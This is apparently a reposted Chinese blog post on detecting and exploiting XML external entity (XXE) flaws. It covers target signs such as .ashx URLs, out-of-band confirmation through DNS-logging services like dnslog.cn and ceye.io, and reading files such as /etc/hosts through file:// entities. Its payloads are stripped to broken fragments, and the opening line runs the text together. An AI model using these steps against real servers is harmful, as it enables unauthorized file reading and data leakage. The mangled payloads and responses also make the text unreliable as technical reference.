作者:活宝贝aaaaa日记_452 | 来源:互联网 | 2023-09-18 20:30
特征特征1.ashx看到url是.ashx后缀的特征2响应体是xml发现有这些特征都可以用下面的流程测试测试在线工具:我这里用举例pyload把替换成你`然后,查看到有记录就说明6
特征
发现有这些特征都可以用下面的流程测试
测试
在线工具:
http://ceye.io/
http://www.dnslog.cn/
我这里用www.dnslog.cn
举例
pyload
把http://127.0.0.1:80
替换成你的Get SubDomain
%xxe; ]>
# or
]>
&sp;
然后点Refresh Record
,有访问记录就说明666了。

任意读取文件测试
原理就是构造一个可以访问系统默认文件hosts的Pyload,然后看看响应,看他说缺啥补充啥。如果是回显型XXE就会将配置文件的信息打印出来。
file:///c:/windows/system32/drivers/etc/hosts
file:///etc/hosts
# pyload
]>
&sp;
# response
1790112020-04-09 16:58:34.877
# pyload
]>
&sp;
# response
1770002020-04-09 17:01:08.121